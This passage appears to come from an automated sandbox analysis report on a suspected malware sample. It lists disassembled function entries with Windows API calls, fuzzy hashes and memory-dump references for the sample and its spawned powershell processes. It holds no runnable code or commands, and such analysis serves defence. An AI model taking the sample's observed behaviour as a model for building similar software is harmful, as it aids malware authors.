                                                                • GetWindowRect.USER32(?,?), ref: 00401BC1
                                                                • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                                                                • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ClientScreen$ParentRectWindow
                                                                • String ID:
                                                                • API String ID: 2099118873-0
                                                                • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                                                • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: _wtol
                                                                • String ID: GUIFlags$[G@
                                                                • API String ID: 2131799477-2126219683
                                                                • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                                                • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                                                APIs
                                                                • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: EnvironmentVariable
                                                                • String ID: ?O@
                                                                • API String ID: 1431749950-3511380453
                                                                • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                                                • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.201200476762.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_5200000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c7f7dc2b1bb4d77747caa98da154c615b7eaf949a4815b5d918853be6190e838
                                                                • Instruction ID: f90dce0c635ceebaf6744111f71dbe5167de3821c10de2240a0914a50b3e2ae6
                                                                • Opcode Fuzzy Hash: c7f7dc2b1bb4d77747caa98da154c615b7eaf949a4815b5d918853be6190e838
                                                                • Instruction Fuzzy Hash: ED917074A00605DFCB15CF58C498ABAFBB5FF88310B25816AD816AB3A5C735EC51CBA4
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.201200476762.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_5200000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8cba27dee64e25422460249fd35fb70eee73069a12b0502544c35f42d9130ae4
                                                                • Instruction ID: f259c12fba4f19d9f9af79c2ef3e85351a886a9d213b496df89fc004f3e32f7d
                                                                • Opcode Fuzzy Hash: 8cba27dee64e25422460249fd35fb70eee73069a12b0502544c35f42d9130ae4
                                                                • Instruction Fuzzy Hash: AA414C74A11205DFCB05CF58C098EBAFBB5FF48310B15816AD81A9B3A5C732EC91CBA4
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.201199699441.00000000034FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034FD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_34fd000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 186170732a32720fe5b3f94bab656619c6e00ff0758011a123c45cb1411ce0bd
                                                                • Instruction ID: 56e5f9f36064e67a5e1e81cd6609b1d8531045c5afc79987246afedd3848013a
                                                                • Opcode Fuzzy Hash: 186170732a32720fe5b3f94bab656619c6e00ff0758011a123c45cb1411ce0bd
                                                                • Instruction Fuzzy Hash: B101407240D3C05FD7128B258894B52BFB8DF43224F1D80DBD9948F297C2695848CB72
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.201199699441.00000000034FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034FD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_34fd000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 03b6c1f604ab611e99bcd95b2f2c2a0efd1c58fde1a0fb07e2939128f726b8e3
                                                                • Instruction ID: a7bdf496933fdedc278927a8d8a3c0035a412ae90bad44c01b848bb7a4edd3fc
                                                                • Opcode Fuzzy Hash: 03b6c1f604ab611e99bcd95b2f2c2a0efd1c58fde1a0fb07e2939128f726b8e3
                                                                • Instruction Fuzzy Hash: C701A7319043409FE7209A15CCC4767FF9CDF42268F1C856BEE551F286D2799845CABA
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.201215383650.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7160000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5db009213ded7a2cf9bf57f482b60f860ecc4de4f917a47e8e69e637d7edfab9
                                                                • Instruction ID: 5c2d439fc86cabd5f3b22484884fc50cc1e84dbbea5dde29b1a67d6d6d03d297
                                                                • Opcode Fuzzy Hash: 5db009213ded7a2cf9bf57f482b60f860ecc4de4f917a47e8e69e637d7edfab9
                                                                • Instruction Fuzzy Hash: A6128A75B0030AAFEB168B6884157BB7BB6AFC1250F14C47AD905DB2D1EB31C861D792
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.201200559092.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_d20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f9f55d00319c8f6f7719add5350d19bd056594ff3d26527a3eb37b0ca373cfc5
                                                                • Instruction ID: b1958dcbe1173eae6dd4596f6577e09ff220a8efa9ebcfe94a1ebf9de6e2d3e6
                                                                • Opcode Fuzzy Hash: f9f55d00319c8f6f7719add5350d19bd056594ff3d26527a3eb37b0ca373cfc5
                                                                • Instruction Fuzzy Hash: AD91AD70A002199FCB15CF58C494ABEFBF1FF98314B2485A9E815AB7A5C735EC51CBA0
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.201215383650.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7160000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5fe913a880cf856a9f99a410a11581ca783b45c9b4f5545ebf86708e37a8e5bf
                                                                • Instruction ID: 7b320dcb49a4192591fc24207b17390ec1b9b777dda1ab49ad96e1b37cd24875
                                                                • Opcode Fuzzy Hash: 5fe913a880cf856a9f99a410a11581ca783b45c9b4f5545ebf86708e37a8e5bf
                                                                • Instruction Fuzzy Hash: 684139B1B0120AEFDB15CB588455A7A7BABAF80784F188069DD04DB291E731CC54EB92
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.201200559092.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_d20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c38798ce5a0f8323668aa7983d90ce3126a604ae74c4ccd38cc45b4bc80a0766
                                                                • Instruction ID: 52a74dc0f7b56ee6b4075e5125e0ad9e3d40ab1df5f86e9f2ea365713a07db9b
                                                                • Opcode Fuzzy Hash: c38798ce5a0f8323668aa7983d90ce3126a604ae74c4ccd38cc45b4bc80a0766
                                                                • Instruction Fuzzy Hash: 89414874A002199FCB15CF48D598ABEF7B1FF58314B1582A9E815AB364C732FC61CBA4
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.201200559092.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_d20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 73dc54b07ebe35d9c340c50ced18149775e25f55a7e777a57b28a24324b7f3ca
                                                                • Instruction ID: 8db69fb15681c79ea53ed88cfff0e819af757a95c442e5592a18095960e67c02
                                                                • Opcode Fuzzy Hash: 73dc54b07ebe35d9c340c50ced18149775e25f55a7e777a57b28a24324b7f3ca
                                                                • Instruction Fuzzy Hash: 25318474A093958FCB12CF68D8949AABFB1EF4631071940EED485DF393C628ED05CB62
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.201200559092.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_d20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aa321d0be353a16b18532a7a7cf2fd403c9e4d3db087223b4d7cf78105789965
                                                                • Instruction ID: dd30b8709bf53f960f4df1e57887d33402e2540e305caf9b7fbb77dbe0224820
                                                                • Opcode Fuzzy Hash: aa321d0be353a16b18532a7a7cf2fd403c9e4d3db087223b4d7cf78105789965
                                                                • Instruction Fuzzy Hash: CE215174A042199FCB04DF98D480AAEFBF4FF89310B15809AE419EB352C735ED41DBA1